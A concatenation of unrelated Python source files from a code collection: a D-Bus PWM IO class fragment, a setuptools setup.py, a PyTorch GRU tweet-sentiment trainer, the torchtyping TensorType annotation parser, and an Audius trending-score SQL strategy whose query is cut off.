    @property
    def Handle(self):
        '''
        The handle of this IO
        '''
        return str(self._handle)

    @property
    def Min(self):
        '''
        Minimum value of pwm (None if the server is unreachable)
        '''
        return self._trycall("GetMin",self._handle,default=None)

    @property
    def Max(self):
        '''
        Maximum value of pwm (None if the server is unreachable)
        '''
        return self._trycall("GetMax",self._handle,default=None)

    @property
    def Value(self):
        '''
        The current value of this IO
        (returns the same as .value)
        '''
        return self._get()

    @Value.setter
    def Value(self,val):
        return self._set(val)

    # duplicate property with lowercase name
    @property
    def value(self):
        '''
        The current value of this IO
        (returns the same as .Value)
        '''
        return self._get()

    # BUG FIX: the original decorated this with ``@Value.setter`` (rebuilding a
    # property from Value's getter); attach the setter to the lowercase
    # property itself instead.
    @value.setter
    def value(self,val):
        return self._set(val)

    # call a function on the IO Group, always on the Pwm D-Bus interface
    def _call(self, method, *args, **kwargs):
        kwargs['interface'] = self._iogroup._dbus_itf_iogroup_pwm
        val = self._iogroup._call(method, *args, **kwargs)
        # print "Return value of {0} is {1}".format(method,val)
        return val

    # like _call(), but returns kwargs['default'] instead of raising when
    # there is no connection
    def _trycall(self, method, *args, **kwargs):
        kwargs['interface'] = self._iogroup._dbus_itf_iogroup_pwm
        val = self._iogroup._trycall(method, *args, **kwargs)
        # print "Return value of {0} is {1}".format(method,val)
        return val

    def _get(self,default=None):
        return self._trycall("GetValue",self._handle,default=default)

    def _set(self, value):
        return self._trycall("SetValue",self._handle,value)

    def _trigger(self,value=None):
        # Called by the owning group when the server signals a change.
        self.OnChanged(value)
setup.py | ceppelli/magic_foundation | 0 | 12760321 | <filename>setup.py
import setuptools
import codecs
import os.path
def read(rel_path):
    """Return the text contents of *rel_path*, resolved relative to this file."""
    base = os.path.abspath(os.path.dirname(__file__))
    with codecs.open(os.path.join(base, rel_path), 'r') as handle:
        return handle.read()
def get_version(rel_path):
    """Extract the package version from the ``__version__ = ...`` line of *rel_path*."""
    for line in read(rel_path).splitlines():
        if line.startswith('__version__'):
            # The version may be quoted with either " or '; split on whichever appears.
            delim = '"' if '"' in line else "'"
            return line.split(delim)[1]
    # No version line found anywhere in the file.
    raise RuntimeError('Unable to find version string.')
# The PyPI long description comes straight from the README.
with open('README.md', 'r') as fh:
    long_description = fh.read()

setuptools.setup(
    name='magic_foundation',
    # Single-source the version from the package's __init__.py.
    version=get_version('src/magic_foundation/__init__.py'),
    author='<NAME>',
    author_email='<EMAIL>',
    description='Minimalistic library that simplifies the adoption of async/await (asyncio) programming style in a multithreaded application.',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/ceppelli/magic_foundation',
    # src/ layout: packages live under src/.
    package_dir={'': 'src'},
    packages=setuptools.find_packages(where='src'),
    license='BSD 3-clause "New" or "Revised License"',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries',
        'Framework :: AsyncIO',
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
    ],
    project_urls={
        'CI: travis': 'https://travis-ci.com/github/ceppelli/magic_foundation',
        'Coverage: codecov': 'https://codecov.io/github/ceppelli/magic_foundation',
        'GitHub: issues': 'https://github.com/ceppelli/magic_foundation/issues',
        'GitHub: repo': 'https://github.com/ceppelli/magic_foundation',
    },
    python_requires='>=3.7',
)
src/neural_networks/RNN.py | Manezki/TwitMine | 0 | 12760322 | import torch
import torch.nn as nn
import numpy as np
import json
import shutil
import sys
import torch.nn.functional as F
from torch.autograd import Variable
from os import path as op
from matplotlib import pyplot, patches
MAX_LEN = 140    # Length of a tweet (characters); inputs are padded/truncated to this.
BATCH_SIZE = 512
EPOCH = 250      # With epoch 0, we will run until interrupted
LR = 1e-4        # LR 1e-4 seems to give stable learning without big oscillation
CONTINUE = True  # Attempts to continue from previous checkpoint
DEBUG = False
CUDA = True      # Train/evaluate on the GPU when available.
TEST_WITH_VALIDATION = False  # Only test with validation data
DATA_SLICE = 40000            # Maximum number of rows taken from each dataset.
# Checkpoint/model files live two directories above this module.
CHECKPOINT_PATH = op.join(op.dirname(__file__), "..", "..", "checkpoint.pt")
MODEL_PATH = op.join(op.dirname(__file__), "..", "..", "model.pt")
def parseFromSemEval(file):
    """Parse a SemEval-style CSV into a numpy array of [text, semantic] rows.

    :param file: path or file-like object accepted by ``pandas.read_csv``;
        the first column is used as the index.
    :return: numpy object array of shape (n, 2).
    """
    # TODO Move to utils
    # TODO Remove dependency on Pandas
    import pandas
    f = pandas.read_csv(file, sep=",", encoding="utf-8", index_col=0)
    # DataFrame.as_matrix() was removed in pandas 0.25; to_numpy() is the
    # supported equivalent.
    return f[["text", "semantic"]].to_numpy()
def _convert_with_vocab(data, vocab_table, max_len=140):
    """Map tweet text to fixed-width rows of character-embedding indices.

    :param data: 2-d array whose column 0 holds the tweet strings.
        TODO Might not work if shape is only 1-d.
    :param vocab_table: dict mapping character -> embedding index.
    :param max_len: row width (default 140, one tweet); longer tweets are
        truncated, shorter ones stay zero-padded. Index 0 doubles as the
        unknown-character/padding value.
    :return: float array of shape (len(data), max_len).
    """
    converted = np.zeros((data.shape[0], max_len))
    for row in range(data.shape[0]):
        txt = data[row, 0]
        for col in range(min(len(txt), max_len)):
            try:
                converted[row, col] = vocab_table[txt[col]]
            except KeyError:
                # Unknown character: keep the 0 padding value.
                pass
    return converted
def _loadSemEvalData(fname):
    """
    Load data from predefined SemEval sources.

    Looks for *fname* first as given, then inside the project data/ directory.
    Returns: parsed [text, semantic] matrix, or the int 0 when the file is
    missing (callers detect failure via isinstance(..., int)).
    """
    DATADIR = op.join(op.dirname(__file__), "..", "..", "data")
    # Test if files exist
    if not op.exists(fname):
        # Check alternative path
        if not op.exists(op.join(DATADIR, fname)):
            print("Could not find {} file. Please run download_data.py from data directory".format(op.join(DATADIR, fname)))
            return 0
        else:
            fname = op.join(DATADIR, fname)
    data = parseFromSemEval(fname)
    return data
def _loadCharacterEmbedding():
    """
    Load character-embedding indexes from the bundled reactionrnn vocabulary.

    Exits the process with -1 if the vocabulary JSON is missing.
    Returns: dict(character, index)
    """
    # Path to unpacked file
    # TODO For packaging use path to site
    VOCAB = op.join(op.dirname(__file__), "..", "..", "assets", "embeddings", "reactionrnn_vocab.json")
    if not op.exists(VOCAB):
        print("Fatal error")
        print("Could not find {} file. Has it been deleted?\nCan be downloaded from https://github.com/Manezki/TwitMine/blob/master/assets/embeddings/reactionrnn_vocab.json".format(VOCAB))
        sys.exit(-1)
    CONVERT_TABLE = json.load(open(VOCAB))
    return CONVERT_TABLE
def batch(tensor, batch_size):
    """Split an indexable array/tensor into a list of consecutive batches.

    All batches have *batch_size* rows except possibly the last one, which
    holds the remainder. An empty input yields an empty list (the original
    implementation returned a single empty batch for empty input).

    :param tensor: anything sliceable with a ``.shape[0]`` length.
    :param batch_size: rows per batch (> 0).
    :return: list of slices of *tensor*.
    """
    length = tensor.shape[0]
    return [tensor[start:start + batch_size]
            for start in range(0, length, batch_size)]
def save_checkpoint(state, is_best, filename=CHECKPOINT_PATH):
    """Persist training *state* to *filename*; mirror it to MODEL_PATH when it is the best so far."""
    torch.save(state, filename)
    if is_best:
        shutil.copyfile(filename, MODEL_PATH)
def plot_progress(training, validation, loss=False):
    """Plot training vs validation curves (accuracy by default, loss when loss=True)."""
    # TODO move to utils
    # BUG argmin line is skewed, x-points wrong?
    xaxis = np.linspace(1, 1+len(training), num=len(training))
    pl1 = pyplot.plot(xaxis, training, color='orange')
    pl2 = pyplot.plot(xaxis, validation, color='blue')
    if not loss:
        pyplot.title("Training vs Validation accuracy")
        pyplot.xlabel("Epoch")
        pyplot.ylabel("Accuracy (%)")
        orange = patches.Patch(color='orange', label="Training accuracy")
        blue = patches.Patch(color='blue', label="Validation accuracy")
    else:
        # Mark the epoch with the lowest validation loss with a red segment.
        minIdx = np.argmin(validation)
        miny = np.min(training)
        pyplot.plot([minIdx, minIdx+1], [miny, validation[minIdx]], color="red")
        pyplot.title("Training vs Validation loss")
        pyplot.xlabel("Epoch")
        pyplot.ylabel("Loss")
        orange = patches.Patch(color='orange', label="Training loss")
        blue = patches.Patch(color='blue', label="Validation loss")
    pyplot.legend(handles=[orange, blue])
    pyplot.show()
class Estimator(object):
    """Keras-style training wrapper around a PyTorch model.

    Based on the wonderful Gist
    https://gist.github.com/kenzotakahashi/ed9631f151710c6bd898499fcf938425
    Uses the module-level CUDA flag for device placement and expects the
    model to expose initHidden(batch_size, input_size).
    """
    def __init__(self, model):
        self.model = model

    def compile(self, optimizer, loss):
        # Keras-style: remember the optimizer and loss function for fit().
        self.optimizer = optimizer
        self.loss_f = loss

    def _fit(self, X_list, y_list):
        """
        train one epoch over pre-batched data; returns (mean loss, mean accuracy)
        """
        loss_list = []
        acc_list = []
        for X, y in zip(X_list, y_list):
            # Labels are shifted from {-1, 0, 1} to {0, 1, 2} for CrossEntropyLoss.
            if CUDA:
                X_v = Variable(torch.from_numpy(X).long(), requires_grad=False).cuda()
                y_v = Variable(torch.from_numpy(y + 1).long(), requires_grad=False).cuda()
                init_hidden = self.model.initHidden(X.shape[0], 100).cuda()
            else:
                X_v = Variable(torch.from_numpy(X).long(), requires_grad=False)
                y_v = Variable(torch.from_numpy(y + 1).long(), requires_grad=False)
                init_hidden = self.model.initHidden(X.shape[0], 100)
            self.optimizer.zero_grad()
            # Original y_pred = self.model(X, self.model.initHidden(X.size()[1]))
            # Init hidden 100, as we perform embedding in the GRU
            y_pred, hidden = self.model(X_v, init_hidden)
            loss = self.loss_f(y_pred, y_v)
            loss.backward()
            self.optimizer.step()
            ## for log
            # NOTE(review): loss.data[0] only works on pre-0.4 PyTorch;
            # newer versions require loss.item() -- confirm the pinned version.
            loss_list.append(loss.data[0])
            classes = torch.topk(y_pred, 1)[1].cpu().data.numpy().flatten()
            #comp = np.hstack((classes.reshape(-1,1), (y+1).reshape(-1,1)))
            #print(comp)
            acc = self._accuracy(classes, y+1)
            acc_list.append(acc)
        return sum(loss_list) / len(loss_list), sum(acc_list) / len(acc_list)

    def fit(self, X, y, batch_size=32, nb_epoch=10, validation_data=()):
        """Train for nb_epoch epochs, recording per-epoch loss/accuracy histories on self."""
        # TODO keep track of the best model state and return it when finished
        X_list = batch(X, batch_size)
        y_list = batch(y, batch_size)
        self.training_cost = []
        self.training_acc = []
        self.validation_cost = []
        self.validation_acc = []
        for t in range(1, nb_epoch + 1):
            loss, acc = self._fit(X_list, y_list)
            self.training_cost.append(loss)
            self.training_acc.append(acc)
            val_log = ''
            if validation_data:
                val_loss, val_acc = self.evaluate(validation_data[0], validation_data[1], batch_size)
                val_log = "- val_loss: %06.4f - val_acc: %06.4f" % (val_loss, val_acc)
                self.validation_cost.append(val_loss)
                self.validation_acc.append(val_acc)
            print("Epoch %s/%s loss: %06.4f - acc: %06.4f %s" % (t, nb_epoch, loss, acc, val_log))

    def evaluate(self, X, y, batch_size=32):
        """Compute (loss, accuracy) on (X, y); also prints class distributions when all 3 classes appear."""
        y_pred, hidden = self.predict(X)
        if CUDA:
            y_v = Variable(torch.from_numpy(y + 1).long(), requires_grad=False).cuda()
        else:
            y_v = Variable(torch.from_numpy(y + 1).long(), requires_grad=False)
        loss = self.loss_f(y_pred, y_v)
        classes = torch.topk(y_pred, 1)[1].cpu().data.numpy().flatten()
        acc = self._accuracy(classes, y+1)
        # Relative class frequencies: ground truth vs predictions.
        _, gt = np.unique(y + 1, return_counts=True)
        gt = gt.astype(float) / len(y)
        _, pr = np.unique(classes, return_counts=True)
        pr = pr.astype(float) / len(y)
        if len(gt) == 3 and len(pr) == 3:
            print("Distribution Grund truth: NEG {}, NEU {}, POS {}".format(gt[0], gt[1], gt[2]))
            print("Distribution predictions: NEG {}, NEU {}, POS {}".format(pr[0], pr[1], pr[2]))
        return loss.data[0], acc

    def _accuracy(self, y_pred, y):
        # Fraction of matching labels.
        return sum(y_pred == y) / y.shape[0]

    def predict(self, X):
        """Forward pass over numpy input X; returns the raw model output (output, hidden)."""
        if CUDA:
            X = Variable(torch.from_numpy(X).long()).cuda()
            init_hidden = self.model.initHidden(X.shape[0], 100).cuda()
        else:
            X = Variable(torch.from_numpy(X).long())
            init_hidden = self.model.initHidden(X.shape[0], 100)
        y_pred = self.model(X, init_hidden)
        return y_pred

    def predict_classes(self, X):
        # NOTE(review): predict() returns an (output, hidden) tuple, so
        # torch.topk on it looks wrong here -- verify before use.
        return torch.topk(self.predict(X), 1)[1].cpu().data.numpy().flatten()
#############
class RNN(nn.Module):
    """Character-level GRU sentiment classifier (3 classes) over 140-character tweets."""
    def __init__(self, input_size, embed_size, hidden_size, output_size, state_dict=None, dict_path=None):
        super(RNN, self).__init__()
        self.hidden_size = hidden_size
        # 401 = vocabulary size of the reactionrnn character embedding; index 0 is padding.
        self.embed = nn.Embedding(401,embed_size, padding_idx=0)
        self.rnn = nn.GRU(embed_size, hidden_size, bias=True, dropout=0.5)
        self.output = nn.Linear(hidden_size, output_size)
        self._create_weight_tensors(input_size, hidden_size, output_size)
        if state_dict is not None:
            self._load_weights(state_dict)
        else:
            self._init_weights(nn.init.kaiming_normal)
        # NOTE(review): softmax is created but never applied in forward();
        # CrossEntropyLoss expects raw logits, so this appears unused.
        self.softmax = nn.LogSoftmax(dim=1)

    def _load_weights(self, state_dict):
        # Restore parameters from a checkpoint produced by save_checkpoint().
        pretrained = torch.load(state_dict)
        self.load_state_dict(pretrained['state_dict'])

    def _create_weight_tensors(self, input_size, hidden_size, output_size):
        # Pre-allocate parameters with the exact shapes expected by the checkpoint.
        self.embed.weight = nn.Parameter(torch.zeros(401, 100))
        self.rnn.weight_ih = nn.Parameter(torch.zeros(3*hidden_size, 100))
        self.rnn.weight_hh = nn.Parameter(torch.zeros(3*hidden_size, hidden_size))
        self.rnn.bias_ih = nn.Parameter(torch.zeros(3*hidden_size))
        self.rnn.bias_hh = nn.Parameter(torch.zeros(3*hidden_size))
        self.output.weight = nn.Parameter(torch.zeros(3, 256))
        self.output.bias_ih = nn.Parameter(torch.zeros(3, 256))

    def _init_weights(self, method):
        method(self.embed.weight)
        method(self.rnn.weight_ih)
        method(self.rnn.weight_hh)
        method(self.output.weight)
        # Bias already 0s

    def forward(self, input, hidden):
        """input: (batch, MAX_LEN) character indices -> (class logits, final GRU hidden state)."""
        embedded = self.embed(input)
        # GRU expects (seq_len, batch, features); swap batch and sequence axes in place.
        embedded.transpose_(0,1)
        out, hidden = self.rnn(embedded, hidden)
        # Classify from the final timestep only.
        lin = F.relu(self.output(out[MAX_LEN-1,:,:]))
        return lin, hidden

    def initHidden(self, batch_size, input_size):
        # NOTE(review): input_size is accepted but ignored.
        return Variable(torch.zeros(1, batch_size, self.hidden_size))
def main():
    """Train/evaluate the tweet-sentiment RNN end to end.

    Loads SemEval CSVs, converts text to character indices, trains with an
    80/20 holdout split, checkpoints on interrupt or completion, and plots
    the accuracy/loss histories.
    """
    training = _loadSemEvalData("dataset_training.csv")
    validation = _loadSemEvalData("dataset_validation.csv")
    # This line prevents running if the data was not loaded, refrase the check for more specific use.
    # Training and Validation should be int only when bad loading
    if isinstance(training, int) and isinstance(validation, int):
        sys.exit(-1)
    # If DATA_SLICE is smaller than data amount, take a subset.
    training = training[:DATA_SLICE, :]
    validation = validation[:DATA_SLICE, :]
    # Convert text column to embedding indexes
    CONVERT_TABLE = _loadCharacterEmbedding()
    training_data = _convert_with_vocab(training, CONVERT_TABLE)
    validation_data = _convert_with_vocab(validation, CONVERT_TABLE)
    training_labels = training[:, 1].astype(int)
    validation_labels = validation[:, 1].astype(int)
    # Split the training data to test and training set.
    # Holdout-method is used, and no further cross validation is performed.
    # TODO Change naming convention from Training, test, validation(unseen data) to Training, validation, test
    X_train = training_data[:int(training_data.shape[0]*0.8), :]
    X_test = training_data[int(training_data.shape[0]*0.8):, :]
    y_train = training_labels[:int(training_labels.shape[0]*0.8)]
    y_test = training_labels[int(training_labels.shape[0]*0.8):]
    epoch = 0
    best_prec = 0.0
    training_cost = []
    training_acc = []
    validation_cost = []
    validation_acc = []
    model = RNN(140, 100, 256, 3, state_dict=op.join(op.dirname(__file__), "..", "..", "assets", "weights", "RNN.pt"))
    if torch.cuda.is_available() and CUDA:
        model.cuda()
        criterion = nn.CrossEntropyLoss().cuda()
    else:
        criterion = nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=LR)
    if op.exists(MODEL_PATH) and CONTINUE:
        # TODO, cannot continue if was trained on CPU and continues on GPU and vice versa
        # NOTE(review): this restores optimizer state and histories but never
        # calls model.load_state_dict() -- model weights come from the assets
        # file above. Confirm that is intentional.
        print("Continuying with the previous model")
        checkpoint = torch.load(MODEL_PATH)
        epoch = checkpoint["epoch"]
        best_prec = checkpoint["best_prec"]
        optimizer.load_state_dict(checkpoint["optimizer"])
        # Reset the learning rate; the checkpointed one may differ from LR.
        for paramGroup in optimizer.param_groups:
            paramGroup['lr'] = LR
        training_cost = checkpoint["train_cost"]
        training_acc = checkpoint["train_hist"]
        validation_cost = checkpoint['valid_cost']
        validation_acc = checkpoint["valid_hist"]
        print("=> loaded checkpoint (epoch {})"
              .format(checkpoint['epoch']))
    print(model)

    def fit_and_log(epoch):
        # Train for `epoch` epochs and append the run's histories to the
        # accumulated lists.
        clf.fit(X_train, y_train, batch_size=BATCH_SIZE, nb_epoch=epoch,
                validation_data=(X_test, y_test))
        [training_cost.append(i) for i in clf.training_cost]
        [training_acc.append(i) for i in clf.training_acc]
        [validation_acc.append(i) for i in clf.validation_acc]
        [validation_cost.append(i) for i in clf.validation_cost]

    clf = Estimator(model)
    clf.compile(optimizer,
                loss=nn.CrossEntropyLoss())
    #loss=nn.CrossEntropyLoss(weight=torch.cuda.FloatTensor([2,1,1.5])))
    if TEST_WITH_VALIDATION:
        # Evaluation-only mode: score the unseen validation data and exit.
        _, VAL_ACC = clf.evaluate(validation_data, validation_labels, BATCH_SIZE)
        print("Validation accuracy on the unseen validation data {}".format(VAL_ACC))
        plot_progress(training_acc, validation_acc)
        plot_progress(training_cost, validation_cost, loss=True)
        return -1
    try:
        if EPOCH == 0:
            # Train until interrupted.
            c = 0
            while True:
                # TODO only saves after finished, should keep tract of the best weights.
                print("Training epoch: {} from current run".format(c))
                fit_and_log(1)
                c+=1
                epoch += 1
        else:
            fit_and_log(EPOCH)
            epoch += EPOCH
    except (KeyboardInterrupt, SystemExit):
        # Save the model before propagating the interrupt.
        if len(validation_acc) != 0:
            is_best = validation_acc[-1] > best_prec
            best_prec = max(validation_acc[-1], best_prec)
            save_checkpoint({
                'epoch': epoch,
                'state_dict': model.state_dict(),
                'best_prec': best_prec,
                'optimizer': optimizer.state_dict(),
                'train_cost': training_cost,
                'train_hist': training_acc,
                # BUG FIX: the original referenced the undefined name
                # `valid_cost` here, raising NameError and losing the
                # checkpoint on interrupt.
                'valid_cost': validation_cost,
                'valid_hist': validation_acc
            }, is_best)
            print("Saved model after interrupt")
        raise
    score, acc = clf.evaluate(X_test, y_test)
    print('Test score:', score)
    print('Test accuracy:', acc)
    # Save the model
    is_best = acc > best_prec
    best_prec = max(acc, best_prec)
    save_checkpoint({
        'epoch': epoch + 1,
        'state_dict': model.state_dict(),
        'best_prec': best_prec,
        'optimizer': optimizer.state_dict(),
        'train_cost': training_cost,
        'train_hist': training_acc,
        'valid_cost': validation_cost,
        'valid_hist': validation_acc
    }, is_best)
    _, VAL_ACC = clf.evaluate(validation_data, validation_labels, BATCH_SIZE)
    print("Validation accuracy on the unseen validation data {}".format(VAL_ACC))
    plot_progress(training_acc, validation_acc)
    plot_progress(training_cost, validation_cost, loss=True)
# Script entry point.
if __name__ == "__main__":
    main()
torchtyping/tensor_type.py | AdilZouitine/torchtyping | 1 | 12760323 | <filename>torchtyping/tensor_type.py
from __future__ import annotations
import sys
import torch
from .tensor_details import (
_Dim,
_no_name,
is_named,
DtypeDetail,
LayoutDetail,
ShapeDetail,
TensorDetail,
)
from .utils import frozendict
from typing import Any, NoReturn
# Annotated is available in python version 3.9 (PEP 593)
if sys.version_info >= (3, 9):
from typing import Annotated
else:
# Else python version is lower than 3.9
# we import Annotated from typing_annotations
from typing_extensions import Annotated
# Not Type[Annotated...] as we want to use this in instance checks.
_AnnotatedType = type(Annotated[torch.Tensor, ...])
# For use when we have a plain TensorType, without any [].
class _TensorTypeMeta(type):
    """Metaclass routing ``isinstance(x, TensorType)`` to a check against ``cls.base_cls``."""
    def __instancecheck__(cls, obj: Any) -> bool:
        return isinstance(obj, cls.base_cls)
class TensorType(metaclass=_TensorTypeMeta):
    """Subscriptable tensor annotation: ``TensorType["batch", 3, torch.float]``.

    Never instantiated; ``TensorType[...]`` produces a ``typing.Annotated``
    wrapper around ``base_cls`` carrying the parsed ``TensorDetail`` checks.
    """
    base_cls = torch.Tensor

    def __new__(cls, *args, **kwargs) -> NoReturn:
        # This class is only a type-annotation factory.
        raise RuntimeError(f"Class {cls.__name__} cannot be instantiated.")

    @staticmethod
    def _type_error(item: Any) -> NoReturn:
        """Uniform error for anything that is not a valid subscript element."""
        raise TypeError(f"{item} not a valid type argument.")

    @classmethod
    def _convert_shape_element(cls, item_i: Any) -> _Dim:
        """Normalize one shape element (int/str/None/slice/.../Any) into a _Dim.

        Conventions: int = fixed size, str = named dim of any size, None =
        unnamed any-size dim, ``name: size`` slice = both, ``...`` = any
        number of dims, Any = one dim of any size.
        """
        if isinstance(item_i, int) and not isinstance(item_i, bool):
            return _Dim(name=_no_name, size=item_i)
        elif isinstance(item_i, str):
            return _Dim(name=item_i, size=-1)
        elif item_i is None:
            return _Dim(name=None, size=-1)
        elif isinstance(item_i, slice):
            # Only "name": size (or "name": ...) slices are meaningful.
            if item_i.step is not None:
                cls._type_error(item_i)
            if item_i.start is not None and not isinstance(item_i.start, str):
                cls._type_error(item_i)
            if item_i.stop is not ... and not isinstance(item_i.stop, int):
                cls._type_error(item_i)
            if item_i.start is None and item_i.stop is ...:
                cls._type_error(item_i)
            return _Dim(name=item_i.start, size=item_i.stop)
        elif item_i is ...:
            return _Dim(name=_no_name, size=...)
        elif item_i is Any:
            return _Dim(name=_no_name, size=-1)
        else:
            cls._type_error(item_i)

    @staticmethod
    def _convert_dtype_element(item_i: Any) -> torch.dtype:
        """Map Python scalar types to torch dtypes; pass torch dtypes through."""
        if item_i is int:
            return torch.long
        elif item_i is float:
            return torch.get_default_dtype()
        elif item_i is bool:
            return torch.bool
        else:
            return item_i

    def __class_getitem__(cls, item: Any) -> _AnnotatedType:
        """Parse the subscript into shape/dtype/layout/extra details and wrap in Annotated."""
        # Normalize the subscript into a tuple of elements; () means scalar.
        if isinstance(item, tuple):
            if len(item) == 0:
                item = ((),)
        else:
            item = (item,)
        scalar_shape = False
        not_ellipsis = False
        not_named_ellipsis = False
        check_names = False
        dims = []
        dtypes = []
        layouts = []
        details = []
        for item_i in item:
            if isinstance(item_i, (int, str, slice)) or item_i in (None, ..., Any):
                item_i = cls._convert_shape_element(item_i)
                if item_i.size is ...:
                    # Supporting an arbitrary number of Ellipsis in arbitrary
                    # locations feels concerningly close to writing a regex
                    # parser and I definitely don't have time for that.
                    if not_ellipsis:
                        raise NotImplementedError(
                            "Having dimensions to the left of `...` is not currently "
                            "supported."
                        )
                    if item_i.name is None:
                        if not_named_ellipsis:
                            raise NotImplementedError(
                                "Having named `...` to the left of unnamed `...` is "
                                "not currently supported."
                            )
                    else:
                        not_named_ellipsis = True
                else:
                    not_ellipsis = True
                dims.append(item_i)
            elif isinstance(item_i, tuple):
                # Only the empty tuple (scalar shape) is allowed here.
                if len(item_i) == 0:
                    scalar_shape = True
                else:
                    cls._type_error(item_i)
            elif item_i in (int, bool, float) or isinstance(item_i, torch.dtype):
                dtypes.append(cls._convert_dtype_element(item_i))
            elif isinstance(item_i, torch.layout):
                layouts.append(item_i)
            elif item_i is is_named:
                check_names = True
            elif isinstance(item_i, TensorDetail):
                details.append(item_i)
            else:
                cls._type_error(item_i)
        if scalar_shape:
            # Scalar shape () is incompatible with explicit dimensions.
            if len(dims) != 0:
                cls._type_error(item)
        else:
            # No dims given -> no shape constraint at all.
            if len(dims) == 0:
                dims = None
        pre_details = []
        if dims is not None:
            pre_details.append(ShapeDetail(dims=dims, check_names=check_names))
        if len(dtypes) == 0:
            pass
        elif len(dtypes) == 1:
            pre_details.append(DtypeDetail(dtype=dtypes[0]))
        else:
            raise TypeError("Cannot have multiple dtypes.")
        if len(layouts) == 0:
            pass
        elif len(layouts) == 1:
            pre_details.append(LayoutDetail(layout=layouts[0]))
        else:
            raise TypeError("Cannot have multiple layouts.")
        details = tuple(pre_details + details)
        assert len(details) > 0
        # Frozen dict needed for Union[TensorType[...], ...], as Union hashes its
        # arguments.
        return Annotated[
            cls.base_cls,
            frozendict(
                {"__torchtyping__": True, "details": details, "cls_name": cls.__name__}
            ),
        ]
| 2.21875 | 2 |
discovery-provider/src/trending_strategies/ML51L_trending_tracks_strategy.py | RahulBansal123/audius-protocol | 0 | 12760324 | import logging
import time
from datetime import datetime
from dateutil.parser import parse
from sqlalchemy.sql import text
from src.trending_strategies.base_trending_strategy import BaseTrendingStrategy
from src.trending_strategies.trending_type_and_version import (
TrendingType,
TrendingVersion,
)
logger = logging.getLogger(__name__)
# Trending Parameters
# Trending Parameters (deliberately terse names; mirrored in the SQL below)
N = 1         # weight: listen count
a = max       # alias of max(); used for the decay floor in z()
M = pow       # alias of pow(); used for the exponential decay in z()
F = 50        # weight: reposts inside the time window
O = 1         # weight: saves inside the time window
R = 0.25      # weight: all-time reposts
i = 0.01      # weight: all-time saves
q = 100000.0  # decay base / floor denominator applied past the window
T = {"day": 1, "week": 7, "month": 30, "year": 365, "allTime": 100000}  # window lengths in days
y = 3         # minimum owner follower count; below this the score is 0
def z(time, track):
    """Compute the trending score of *track* for the given *time* window.

    Score = (N*listens + F*windowed_reposts + O*windowed_saves
             + R*reposts + i*saves) * karma, exponentially decayed
    once the track is older than the window; tracks whose owner has fewer
    than `y` followers score 0. Returns the track dict with 'score' added.
    """
    # pylint: disable=W,C,R
    E = track["listens"]
    e = track["windowed_repost_count"]
    t = track["repost_count"]
    x = track["windowed_save_count"]
    A = track["save_count"]
    o = track["created_at"]
    l = track["owner_follower_count"]
    j = track["karma"]
    # Owners below the follower threshold never trend.
    if l < y:
        return {"score": 0, **track}
    H = (N * E + F * e + O * x + R * t + i * A) * j
    L = T[time]
    K = datetime.now()
    w = parse(o)
    k = (K - w).days
    Q = 1
    # Past the window, decay exponentially with a 1/q floor.
    if k > L:
        Q = a((1.0 / q), (M(q, (1 - k / L))))
    return {"score": H * Q, **track}
class TrendingTracksStrategyML51L(BaseTrendingStrategy):
    """Trending-tracks strategy ML51L: all scores are computed in SQL, not per track in Python."""
    def __init__(self):
        # Trailing True flag is forwarded to BaseTrendingStrategy
        # (presumably enables SQL-side score updates -- see base class).
        super().__init__(TrendingType.TRACKS, TrendingVersion.ML51L, True)

    def get_track_score(self, time_range, track):
        # Per-track Python scoring is intentionally unsupported for this
        # version; update_track_score_query() does all the work instead.
        logger.error(
            f"get_track_score not implemented for Trending Tracks Strategy with version {TrendingVersion.ML51L}"
        )

    def update_track_score_query(self, session):
        """Recompute week/month/allTime trending scores for all tracks in one SQL transaction.

        The SQL mirrors the z() formula above: weighted listens/reposts/saves
        times karma, exponentially decayed past the window, zeroed below the
        follower threshold.
        """
        start_time = time.time()
        trending_track_query = text(
            """
            begin;
                DELETE FROM track_trending_scores WHERE type=:type AND version=:version;
                INSERT INTO track_trending_scores
                    (track_id, genre, type, version, time_range, score, created_at)
                select
                    tp.track_id,
                    tp.genre,
                    :type,
                    :version,
                    :week_time_range,
                    CASE
                    WHEN tp.owner_follower_count < :y
                    THEN 0
                    WHEN EXTRACT(DAYS from now() - aip.created_at) > :week
                    THEN greatest(1.0/:q, pow(:q, greatest(-10, 1.0 - 1.0*EXTRACT(DAYS from now() - aip.created_at)/:week))) * (:N * aip.week_listen_counts + :F * tp.repost_week_count + :O * tp.save_week_count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
                    ELSE (:N * aip.week_listen_counts + :F * tp.repost_week_count + :O * tp.save_week_count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
                    END as week_score,
                    now()
                from trending_params tp
                inner join aggregate_interval_plays aip
                    on tp.track_id = aip.track_id;
                INSERT INTO track_trending_scores
                    (track_id, genre, type, version, time_range, score, created_at)
                select
                    tp.track_id,
                    tp.genre,
                    :type,
                    :version,
                    :month_time_range,
                    CASE
                    WHEN tp.owner_follower_count < :y
                    THEN 0
                    WHEN EXTRACT(DAYS from now() - aip.created_at) > :month
                    THEN greatest(1.0/:q, pow(:q, greatest(-10, 1.0 - 1.0*EXTRACT(DAYS from now() - aip.created_at)/:month))) * (:N * aip.month_listen_counts + :F * tp.repost_month_count + :O * tp.save_month_count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
                    ELSE (:N * aip.month_listen_counts + :F * tp.repost_month_count + :O * tp.save_month_count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
                    END as month_score,
                    now()
                from trending_params tp
                inner join aggregate_interval_plays aip
                    on tp.track_id = aip.track_id;
                INSERT INTO track_trending_scores
                    (track_id, genre, type, version, time_range, score, created_at)
                select
                    tp.track_id,
                    tp.genre,
                    :type,
                    :version,
                    :all_time_time_range,
                    CASE
                    WHEN tp.owner_follower_count < :y
                    THEN 0
                    ELSE (:N * ap.count + :R * tp.repost_count + :i * tp.save_count) * tp.karma
                    END as all_time_score,
                    now()
                from trending_params tp
                inner join aggregate_plays ap
                    on tp.track_id = ap.play_item_id
                inner join tracks t
                    on ap.play_item_id = t.track_id
